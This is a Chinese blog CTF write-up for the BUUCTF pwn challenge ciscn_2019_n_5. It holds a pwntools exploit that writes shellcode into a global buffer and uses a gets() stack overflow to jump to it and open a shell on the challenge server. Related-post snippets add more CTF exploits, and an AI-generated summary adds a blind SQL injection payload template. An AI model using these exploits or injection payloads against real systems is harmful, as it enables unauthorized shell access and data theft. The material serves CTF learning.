BUUCTF-ciscn_2019_n_51

最新推荐文章于 2025-02-15 13:30:44 发布
最新推荐文章于 2025-02-15 13:30:44 发布
阅读量453 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: BUUCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/arraylocalhost/article/details/127217446
本文介绍了一个利用栈溢出漏洞获取系统权限的过程。通过分析未开启保护的程序,找到gets()函数溢出点,并构造payload发送shellcode,最终实现getshell。使用Python编写了exploit脚本。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x1 checksec

没有开启保护,有可写segments,考虑shellcode

0x2 IDA 

1.main

gets()函数溢出点

 

偏移量

栈溢出到shellcode,getshell 

0x3 EXP

from pwn import *
context.log_level="debug"
p=remote("node4.buuoj.cn",29553)

context.arch="amd64"
shellcode=asm(shellcraft.sh())

name=0x601080
p.recvuntil("name\n")

p.sendline(shellcode)

p.recvuntil("?\n")
payload="A"*0x28+p64(name)

p.sendline(payload)


p.interactive()

buuctfciscn_2019_c_1
weixin_54452942的博客
04-18 900
通俗易懂
[BUUCTF]-PWN:ciscn_2019_n_3解析
2301_79326813的博客
01-20 928
堆题,先看保护32位,Partial RELRO,没pie关键信息就那么多,看ida大致就是alloc创建堆块,free释放堆块,dump打印堆块内容但是仔细看这三个函数就可以发现在实际运行中,会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。看delete函数并结合动态调试,可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址,我们在free堆块时他都会执行,并且题目给了我们system。
BUUCTF-ciscn_2019_ne_51
Rt1Text的博客
10-09 392
根据文件名可知是other shellcode。
[BUUCTF]PWN5——ciscn_2019_n_1
mcmuyanga的博客
08-25 2311
[BUUCTF]4——ciscn_2019_n_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_n_1 步骤: 例行检查,64位,开启了nx保护 nc一下看看输入点的字符串,看运行结果猜测是一个猜数的程序,而且需要我们猜的数应该是11.28125 输入11.28125,发现还是不对 用64位ida打开,首先shift+f12查看程序里的字符串,发现了 “ cat /flag ” 双击跟进,ctrl+x找到调用这个字符串的函数 我们可以看到第10行的if
buuctf ciscn_2019_n_5
qq_53912227的博客
02-15 228
发现有个name的全局变量(bss),这个时候就想到用ret2shellcode,但是实际上是不行的,因为这个name的bss不具有x权限。shift+f12发现没有system和binsh等字符串,因此就需要用到ret2libc,这里的puts正好提前被使用了。发现NX unknown(想到了ret2shellcode)这个时候就可以确定ret2shellcode不行。开局:典型的ret2libc,老规矩,file 文件。
BUUCTF ciscn_2019_n_5
2401_88087539的博客
01-14 421
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
BUUCTF 刷题 ciscn_2019_n_5
Helloity的博客
02-09 3303
先附上题目:BUUCTF在线评测 放到我们的虚拟机上checksec一下,64位程序,拥有RWX段。 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 接下来放到IDA里f5一下,可以看到主函数读
BUUCTF ciscn_2019_c_1 题解
qq_51802916的博客
08-20 498
这个地方还会涉及到堆栈对齐的问题,有时候POC都构造正确了,但是运行时仍然报段错误,可能就是堆栈没有对齐,这是我们可以加入一条ret指令,改变一下堆栈,例如假如rsp指向了0xff88,这是一个没有对齐的地址,增加ret后就会变成0xff90,这个一个已经对齐的地址,可以正常运行。,这里显然可以进行缓冲区溢出利用,中间的部分是对字符串进行处理,我们不需要看得太仔细,因为可以通过传入\x00字符使循环提前终止,这样就不会影响我们的payload的了。的装载地址和shell字符串的装载地址,然后构造POC了。
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 690
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
BUUCTF栈迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1144
1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
BUUCTFciscn_2019_n_5 Write Up
古月浪子的博客
08-06 565
这个反编译有点不准确,不过大概意思能理解到,先读入0x64字符到bss段上,然后用gets函数读入到栈上 什么保护都没开,我们发现可以直接执行bss段上的代码 思路很简单,将shellcode写入bss段,然后栈溢出rop到bss段上执行shellcode,拿到shell 注意栈帧大小 from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='amd64'.
ciscn_2019_n_5
、moddemod
06-17 363
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level = 'debug') proc_name = './ciscn_2019_n_5' # p = process(proc_name) p = remote('node3.buuoj.cn', 28451) elf = ELF(proc_name) p.sendline('a'.encode()).
【CTF】ciscn_2019_n_5
凉水的博客
04-22 1074
题目分析 1 反编译,寻找可以利用的地方 main函数的反编译结果如下: int main(void) { 1 char text [30]; 2 setvbuf(stdout,(char *)0x0,2,0); 3 puts("tell me your name"); 4 read(0,name,100); 5 puts("wow~ nice name!"); 6 puts("What do you want to say to me?"); 7 gets(text);
pwn 2
2303_80471032的博客
02-03 414
1.checksec查看文件保护64位,基本没有保护2.将文件放入ida,f5查看反编译的代码找到name地址3.gdb查一下bss段的权限,可执行,可将shellcode注入name段4.计算偏移量5.写脚本6.运行得到flag。
BUUCTF-pwn-ciscn_2019_ne_51
qq_30528603的博客
11-29 206
我们看到strcpy是将src的内容复制到dest。我们前面看到src允许我们输入128个字节。而dest数组离ebp只有0x48个字节。32为程序没有canary没有PIE,应该是简单的栈溢出。程序上来是输入一个密码验证。随便输入下错误直接退出。那么我们需要构造的东西都有了,接着就是找溢出点。它会把我们的输入放入src这个数组中。主函数大致流程在此。当找不到/bin/sh的时候,可以用sh代替。这里就有一个小技巧了。
华北赛区 hackworld 1
最新发布
03-27
<think>好的,用户想了解华北赛区 HackWorld 的相关信息,具体是比赛详情或介绍。首先,我需要查看提供的引用内容,看看有没有相关的信息。 引用[3]提到的是[CISCN2019 华北赛区 Day2 Web1]Hack World1,说明Hack World是CISCN 2019华北赛区的一个题目,属于Web类。用户通过爆破得到flag,但过程较慢,需要关闭程序避免一直跑。这里提到研究脚本的重要性,可能涉及到SQL盲注或二分法脚本的使用。 引用[4]和[5]同样来自BUUCTF平台,涉及同一题目。引用[4]提到使用二分法脚本来处理盲注题目,引用[5]则给出了具体的注入语句,比如0^(ascii(substr((select(flag)from(flag)),{},1))>{}),说明题目需要利用布尔盲注技术,通过构造条件判断来逐位获取flag。 综合来看,Hack World是2019年华北赛区的一道Web题,主要考察布尔盲注和脚本编写能力。题目设计可能涉及绕过过滤机制,通过时间盲注或布尔盲注来爆破数据库中的flag。需要选手编写自动化脚本,如二分法,来高效提取数据。此外,引用中提到走弯路尝试爆破表名,但实际可以通过直接构造正确的注入语句来获取flag,这提示题目可能存在一定的技巧性,需要灵活运用SQL注入知识。 用户可能需要了解题目的具体解题步骤、使用的技术点以及相关脚本的编写方法。此外,是否需要更多细节,比如题目的环境搭建、过滤规则或具体的payload构造?需要根据用户的问题范围来组织回答,确保涵盖关键点,如题目类型、考察技能、解题思路和引用中的具体方法。</think>### HackWorld 华北赛区比赛信息梳理 根据提供的引用内容,HackWorld 是**CISCN(全国大学生信息安全竞赛)华北赛区**中的一道经典 Web 类题目,出现在 **2019 年赛题**中,涉及**布尔盲注**和**自动化脚本爆破**技术[^3][^4][^5]。 --- ### 1. 题目背景与类型 - **赛题名称**:`[CISCN2019 华北赛区 Day2 Web1]Hack World` - **题目类型**:Web 安全(SQL 注入) - **核心考察点**: - 布尔盲注(Boolean-based Blind SQLi) - 绕过过滤规则的注入语句构造 - 自动化脚本编写(如二分法加速爆破) --- ### 2. 题目关键设计 - **过滤规则**:题目可能对部分 SQL 关键字或符号进行了过滤,需构造绕过语句。 - **注入点**:通过输入参数传递恶意 SQL 片段,例如利用条件表达式 `0^(ASCII(SUBSTR(...)) > N)` 逐位爆破 flag。 - **返回值设计**:通过页面返回的布尔值(如 0 或 1)判断条件真假[^4]。 --- ### 3. 解题思路 1. **判断注入类型**:确认存在布尔盲注漏洞。 2. **构造注入语句**: ```sql 0^(ASCII(SUBSTR((SELECT flag FROM flag), {position}, 1)) > {value}) ``` 通过修改 `position` 和 `value` 逐字符爆破 flag。 3. **编写脚本**:使用二分法优化爆破速度,减少请求次数。 4. **注意事项**:需及时终止脚本避免资源浪费。 --- ### 4. 相关引用总结 - **引用[3]**:提到爆破 flag 的耗时问题,强调脚本终止的重要性。 - **引用[4]**:说明使用二分法脚本加速盲注过程。 - **引用[5]**:给出具体的注入语句模板,直接爆破 `flag` 字段值。 ---
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值